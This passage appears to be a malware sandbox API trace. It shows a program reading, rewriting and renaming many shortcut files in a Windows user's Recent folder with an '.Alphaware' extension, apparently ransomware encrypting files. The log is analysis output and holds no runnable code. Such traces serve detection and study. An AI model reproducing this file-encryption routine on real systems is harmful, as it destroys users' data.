(dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.607] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mxWMxpSlb1Z2y3xfhO0.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mxwmxpslb1z2y3xfho0.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mxWMxpSlb1Z2y3xfhO0.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\mxwmxpslb1z2y3xfho0.swf.lnk.alphaware")) returned 1 [0097.608] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk", dwFileAttributes=0x80) returned 1 [0097.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.609] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2523f48 | out: lpFileInformation=0x2523f48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce885c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd06df4c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x4f3)) returned 1 [0097.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.609] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.609] GetFileType (hFile=0x250) returned 0x1 [0097.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.610] GetFileType (hFile=0x250) returned 0x1 [0097.610] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x4f3 [0097.610] ReadFile (in: hFile=0x250, lpBuffer=0x2524710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2524710*, lpNumberOfBytesRead=0x23e958*=0x4f3, lpOverlapped=0x0) returned 1 [0097.611] CloseHandle (hObject=0x250) returned 1 [0097.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.634] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.635] GetFileType (hFile=0x250) returned 0x1 [0097.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.635] GetFileType (hFile=0x250) returned 0x1 [0097.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.637] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce885c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c649e00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x774)) returned 1 [0097.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.637] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk.alphaware")) returned 1 [0097.638] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk", dwFileAttributes=0x80) returned 1 [0097.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.638] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25a67a0 | out: lpFileInformation=0x25a67a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0588860, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a97720, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a97720, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x518)) returned 1 [0097.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.639] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.639] GetFileType (hFile=0x250) returned 0x1 [0097.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.639] GetFileType (hFile=0x250) returned 0x1 [0097.639] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x518 [0097.640] ReadFile (in: hFile=0x250, lpBuffer=0x25a6f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25a6f88*, lpNumberOfBytesRead=0x23e958*=0x518, lpOverlapped=0x0) returned 1 [0097.641] CloseHandle (hObject=0x250) returned 1 [0097.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.684] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.690] GetFileType (hFile=0x250) returned 0x1 [0097.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.691] GetFileType (hFile=0x250) returned 0x1 [0097.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0588860, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a97720, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c6e2380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x7a0)) returned 1 [0097.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.693] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk.alphaware")) returned 1 [0097.695] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk", dwFileAttributes=0x80) returned 1 [0097.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.696] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24282f8 | out: lpFileInformation=0x24282f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfaac400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1632260, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1632260, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x4fe)) returned 1 [0097.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.697] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.697] GetFileType (hFile=0x250) returned 0x1 [0097.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.697] GetFileType (hFile=0x250) returned 0x1 [0097.698] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x4fe [0097.698] ReadFile (in: hFile=0x250, lpBuffer=0x2428ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2428ac8*, lpNumberOfBytesRead=0x23e958*=0x4fe, lpOverlapped=0x0) returned 1 [0097.699] CloseHandle (hObject=0x250) returned 1 [0097.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.743] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.744] GetFileType (hFile=0x250) returned 0x1 [0097.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.745] GetFileType (hFile=0x250) returned 0x1 [0097.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.747] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfaac400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1632260, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c7547a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x774)) returned 1 [0097.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.747] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Videos.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\my videos.lnk.alphaware")) returned 1 [0097.749] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\No5ewLi.lnk", dwFileAttributes=0x80) returned 1 [0097.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.750] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\No5ewLi.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\no5ewli.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24ab228 | out: lpFileInformation=0x24ab228*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1207be0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1207be0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1207be0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x992)) returned 1 [0097.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.752] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\No5ewLi.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\no5ewli.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.752] GetFileType (hFile=0x250) returned 0x1 [0097.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.753] GetFileType (hFile=0x250) returned 0x1 [0097.753] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x992 [0097.753] ReadFile (in: hFile=0x250, lpBuffer=0x24abe58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24abe58*, lpNumberOfBytesRead=0x23e958*=0x992, lpOverlapped=0x0) returned 1 [0097.754] CloseHandle (hObject=0x250) returned 1 [0097.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.779] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\No5ewLi.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\no5ewli.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.781] GetFileType (hFile=0x250) returned 0x1 [0097.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.781] GetFileType (hFile=0x250) returned 0x1 [0097.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.783] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\No5ewLi.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\no5ewli.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1207be0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1207be0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c7a0a60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xda0)) returned 1 [0097.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.783] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\No5ewLi.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\no5ewli.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\No5ewLi.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\no5ewli.lnk.alphaware")) returned 1 [0097.785] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NQCf5ew.lnk", dwFileAttributes=0x80) returned 1 [0097.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.785] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NQCf5ew.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqcf5ew.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2530ec8 | out: lpFileInformation=0x2530ec8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd01f6760, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ff28a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0ff28a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x122b)) returned 1 [0097.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.786] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NQCf5ew.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqcf5ew.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.786] GetFileType (hFile=0x250) returned 0x1 [0097.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.786] GetFileType (hFile=0x250) returned 0x1 [0097.786] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x122b [0097.786] ReadFile (in: hFile=0x250, lpBuffer=0x2531160, nNumberOfBytesToRead=0x122b, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2531160*, lpNumberOfBytesRead=0x23e958*=0x122b, lpOverlapped=0x0) returned 1 [0097.787] CloseHandle (hObject=0x250) returned 1 [0097.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.812] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NQCf5ew.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqcf5ew.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.814] GetFileType (hFile=0x250) returned 0x1 [0097.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.814] GetFileType (hFile=0x250) returned 0x1 [0097.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.816] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NQCf5ew.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqcf5ew.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01f6760, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ff28a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c812e80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1908)) returned 1 [0097.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.816] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NQCf5ew.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqcf5ew.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NQCf5ew.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqcf5ew.lnk.alphaware")) returned 1 [0097.817] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NqR9nQMJn0 I.lnk", dwFileAttributes=0x80) returned 1 [0097.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.818] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NqR9nQMJn0 I.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqr9nqmjn0 i.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25bbca8 | out: lpFileInformation=0x25bbca8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0a4b460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd127a000, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd127a000, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1266)) returned 1 [0097.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0097.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0097.818] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NqR9nQMJn0 I.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqr9nqmjn0 i.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.818] GetFileType (hFile=0x250) returned 0x1 [0097.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0097.819] GetFileType (hFile=0x250) returned 0x1 [0097.819] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x1266 [0097.819] ReadFile (in: hFile=0x250, lpBuffer=0x25bbf68, nNumberOfBytesToRead=0x1266, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25bbf68*, lpNumberOfBytesRead=0x23e958*=0x1266, lpOverlapped=0x0) returned 1 [0097.820] CloseHandle (hObject=0x250) returned 1 [0097.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0097.865] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NqR9nQMJn0 I.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqr9nqmjn0 i.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.868] GetFileType (hFile=0x250) returned 0x1 [0097.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0097.868] GetFileType (hFile=0x250) returned 0x1 [0097.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0097.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NqR9nQMJn0 I.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqr9nqmjn0 i.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a4b460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd127a000, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c8852a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1960)) returned 1 [0097.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0097.871] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NqR9nQMJn0 I.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqr9nqmjn0 i.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\NqR9nQMJn0 I.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\nqr9nqmjn0 i.lnk.alphaware")) returned 1 [0097.873] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N_rlN0Z3nRhZqdxj JZI.lnk", dwFileAttributes=0x80) returned 1 [0097.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0097.874] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N_rlN0Z3nRhZqdxj JZI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\n_rln0z3nrhzqdxj jzi.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2447b30 | out: lpFileInformation=0x2447b30*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf4468e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf4468e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf4468e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3ed)) returned 